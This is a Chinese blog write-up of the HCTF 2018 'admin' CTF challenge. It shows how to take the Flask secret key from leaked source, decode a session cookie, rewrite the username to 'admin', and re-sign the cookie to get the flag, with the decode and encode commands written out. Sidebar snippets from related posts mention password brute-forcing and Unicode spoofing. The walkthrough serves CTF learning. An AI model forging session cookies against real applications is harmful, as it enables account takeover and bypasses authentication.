BUUCTF [HCTF 2018]admin 1

最新推荐文章于 2023-11-13 10:46:01 发布
最新推荐文章于 2023-11-13 10:46:01 发布
阅读量4.5k 收藏 12
点赞数 3
分类专栏: ctf buuctf 刷题日记
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_45642610/article/details/112685368
版权
ctf 同时被 3 个专栏收录
27 篇文章 3 订阅
订阅专栏
buuctf
26 篇文章 2 订阅
订阅专栏
刷题日记
24 篇文章 2 订阅
订阅专栏

BUUCTF [HCTF 2018]admin 1

在这里插入图片描述进去后是这样,右上角有注册登录。看看主页源码。
在这里插入图片描述

看来如果是admin(管理员)会有东西不同。
随便注册一个账号,登录(注册登录的源码都看看,所有的页面源码都要看!找提示,甚至一行一行代码看)。
在改密码界面看到:
在这里插入图片描述
输网址,下载。
在这里插入图片描述
用pycharm或其他打开,审计代码。先看路由(route)
在这里插入图片描述
在这里插入图片描述
没什么特别的,就其他都看看。最后在templates目录下的index.html找到
在这里插入图片描述
如果session等于admin就出hctf{},即flag。
而提示flask就有用了,flask是轻量级web框架,session存在客户端,我们可以伪造session(cookie)。
下载flask编码解码器
安装,用法在readme。
简单来说,去到它的目录下,可以看到setup.py
在这里插入图片描述
win+r输入cmd,cd到该目录,输入以下语句安装。安装成功后可以用pip list确认清单是否有flask相关。

python setup.py install

用法:输入py3 flask3.py decode -h显示decode帮助-s “…” (secret key)-c “…” (session ckkie value)可以不加引号,最好加。

secret key在config.py
在这里插入图片描述session ckkie value在随便一个页面存储的cookie里
在这里插入图片描述解码:

py3 flask3.py decode -s ckj123 -c ".eJw9kEFvgkAQRv9KM2cOsOiFxAPNAjHpDMEskt2LsYqWXdY2oKms8b93tYmHOb3k5Xtzg81haMcvSM7DpQ1g0-0hucHbJyQghWFUKKsKOZdNNSOODt3Okcs7cnWorL9i3VMjIxR4RWd-PZ9IKyOZsiSyWIl6pkTek-it4mlEeneVrvaOdCK-0kqQKT2Xet1hgyHxY0QMJxSky2LVo3u3VCBTnAzpNPSOGLXfoh88m5dNxmSTLeAewG4cDpvzt2lPrwTF884H9ChyI20Vkt5bYtUkxSPBOOJ1XPJeo669aunVy5iOi6eus9tj-zJh_fNB6T85ba0HELEYAriM7fD8GkQh3P8AhlRrKA.YAFz_w.drvVUPQMecMpeOp54B9BuvgM--8"

在这里插入图片描述

把name后面的你登录的用户名改为admin再加密:

py3 flask3.py encode -s ckj123 -t "{'_fresh': True, '_id': b'a964ffdf9ad843337371b754fe4dee5f513139037266dcff517e58e1e59fd05671c5370244ce3d91eb5b1c44857c213c8de30f4c6d3d604d0724863c8a99a6aa', 'csrf_token': b'd1bffe11dbd467f7d2a1b79345789c2599b72276', 'image': b'1JK4', 'name': 'admin', 'user_id': '10'}"

在这里插入图片描述
把加密后的session输回去然后返回index主页就可以看到flag
在这里插入图片描述
还有两种解法我这个水平还无法理解,想看可以去一题三解之2018HCTF&admin

__byb__
关注
  • 3
    点赞
  • 12
    收藏
    觉得还不错? 一键收藏
  • 8
    评论
专栏目录
[HCTF 2018]admin 1学习笔记
weixin_45869407的博客
09-27 1015
之前在云演做ctf题,虽然简单但比较系统,感觉比较适合新手,但也要练一下有点难度的ctf,所以又做了一下buuctf,果然上来就是sql注入,xss注入,发现没什么效果,然后跑去看大佬writeup,真是看一次,学一次,自己也有总结。 做这个题有三种方法,首先非预期解分别为session伪造、弱口令,预期解为Unicode欺骗。 1 首先讲讲session伪造: 因为之前做过一段时间的python的flask后台开发,所以对于session跨域还是比较了解的,但对于新手来说,还是有点不好理解的,所谓通俗一点
admin_howevers1r_ERP_admin_
10-02
erp企业资源管理系统
2018手工更新FlatLab Admin Template
09-15
原来下载那个30分的,不是最新版的,浪费了时间,实在没办法就自己手工从官网下载,遂分享给大家
Admin管理员登录界面
08-14
Admin管理员管理界面,自己只需做少量修改就可以用了。
1Admin系统管理员.zip
10-10
1Admin系统管理员
BUUCTF-[HCTF 2018]admin1
Monica的博客
11-15 6545
题目 分析 打开环境,页面啥也没有,日常查看源代码 提示说你不是admin,所以这题可能是我们为admin才可以得到flag 在login页面找到登录框 刚开始以为是sql注入,直接万能密码;结果试了几种方法发现不是报错就是提示用户名密码错误 ...
buuctf|[HCTF 2018]admin 1
m0_64236521的博客
02-04 335
[HCTF 2018]admin 1
web buuctf [HCTF 2018]admin1
weixin_44214568的博客
03-13 2786
查看首页源代码,有注释 <!-- you are not admin --> 考虑这道题很有可能是用admin或者伪造admin进行登录, 用admin进行登录,随便填写密码进不去,发现页面有注册选项,用admin注册提示已经被注册 方法一:burp爆破 进入登录界面,用户名输admin,密码随便填,抓包对密码进行爆破; 爆破之后,提示429和302,可以看一下429的response,提示的是太多请求的问题, 更改options中的选项 控制数据量,我因为正.
[HCTF 2018]admin 1
qq_43618536的博客
07-02 509
BUUCTF的[HCTF 2018]admin 1
BUUCTF之 [HCTF 2018]admin
m0_62107966的博客
09-22 865
BUUCTF之 [HCTF 2018]admin-----这里的ckj123等下使用脚本时是需要用来作为参数的。刚刚以 1 用户登进去后给了个session源代码的意思是:用户如果以admin的身份登录,就直接可以拿到flag了,所以直接注册账号为admin,密码为123就成功拿到flag了。如果使用脚本的话,就需要伪造session为admin登陆的时候。使用脚本解密,脚本命名为session解密.py运行得到:得到如下:将name的值修改为admin,重新用脚本在进行加密。
HCTF2018逆向LuckyStar分析
11-12
HCTF2018逆向LuckyStar分析HCTF2018逆向LuckyStar分析
symtec netbackup admin guide.1
08-10
symtec netbackup admin guide.1
[HCTF 2018]admin1
cuddlylm的博客
05-13 1489
Flask的session使用: https://www.jianshu.com/p/278d4f59839d 进去看见注册登录框以为是sql注入,想到和sql-labs有一关有点一样,先随便注册一个账户然后通过这个账户修改admin账户的密码,最后登录admin账户进行信息搜集 不过这题好像不一样 方法一:flask session伪造 刚开始的几个页面没有啥有用的信息,先注册一个登录然后在修改密码界面有一个提示(界面很多,但是没有线索的时候,尽量把所有源码都看完,不有遗漏) falsk中ses.
admin是谁,以及如何修改admin密码
热门推荐
初衷的博客
12-07 4万+
一、admin是谁? admin是多可文档管理系统默认的系统管理员。当你安装完多可文档管理系统后,立刻就能通过他来登陆多可系统。 admin是包含在用户数里的。如果你用的是10个用户的免费版,那么admin就会占用一个用户,也就是说你可以再注册9个用户;如果你用的是超过10个用户的收费版本,也是同样道理,admin始终会占用一个用户名额。 千万不要觉得亏哦。因为admin本身就是一个可以正常使用的用户帐号,只不过是权限最大的超级用户罢了。而且,如果你觉得admin这个名字看着不顺眼,你可以改名,改成任
[HCTF 2018]admin 1(四种解法!)
最新发布
m0_73734159的博客
11-13 962
好,这就简单了,admin用户存在,但是不清楚admin用户的密码。输入admin用户-密码任意比如说1-登录-并使用burp进行抓包。不过话说回来,还是不应该投机取巧,咱们按照正常步骤走一遍。Start attack开始爆破。显示admin用户已经被注册了。光标选中1,Add添加即可。先注册一个admin用户。Intruder送去爆破。得到admin用户的密码。进去login登陆界面。有登录和注册两个按钮。
[HCTF 2018]admin (三种解法详细详解)
记录学习,一起进步
01-17 2151
[HCTF 2018]admin
BUUCTF WEB admin1
qq_41696858的博客
09-03 730
这题考的是flask框架的session机制 和我以前观念里不太一样的一点是flask这个框架,session是完全存在本地的,只不过存在着一种加密算法,把它加密了存在了本地,也就是说我们只要有了加密密钥,那session里的值是完全可以被我们修改的 打开场景,查看源码,/login,/register是提示you are not admin 那么就是要以admin权限登录了,几个页面翻了几遍也没找到sql注入啥的漏洞,那只能考虑越权了 先注册一个普通用户,test,1234,登录,查看页面源码,发现a链接
buuctf [强网杯 2019]随便注 1
weixin_45642610的博客
01-07 1万+
buuctf web [强网杯 2019]随便注 1 -刷题个人日记 小白一个,写给自己看。 打开后是这样。 从题目和内容来看就是一道sql注入题。 输入 1' or 1=1;# 这个#用来注释掉后面的sql语句 显示所有数据,这个数据有什么用我也不知道,但sql注入一般第一步就是这样看看有没有有用的信息(没有)。 输入 1' order by 2;# 1' order by 3;# 到第3列报错,说明只显示两列。 输入1'; show tables;# 可以看到有 191981093
curl opensearch 修改admin1密码
06-06
要使用curl命令来修改OpenSearch的admin1密码,您可以按照以下步骤操作: 1. 打开终端或命令行界面。 2. 输入以下命令,替换其中的<username>、<password>、<new_password>和<admin1_username>为您自己的用户名、密码、新密码和要修改的管理员用户名: ``` curl -X PUT -u <username>:<password> -H 'Content-Type: application/json' -d '{"password": "<new_password>"}' https://<endpoint>/_opendistro/_security/api/internalusers/<admin1_username> ``` 其中,<endpoint>是您OpenSearch的终端节点地址。 3. 按下回车键执行命令,如果修改成功,您会看到类似以下的输出: ``` {"_index":".opendistro_security","_type":"doc","_id":"internalusers/<admin1_username>","_version":1,"result":"updated","_shards":{"total":2,"successful":1,"failed":0},"_seq_no":10,"_primary_term":1} ``` 4. 使用新密码重新登录OpenSearch的管理控制台。 请注意,如果您的OpenSearch集群已启用了安全模块,您需要先通过管理员账户登录才能执行此操作。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论 8
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值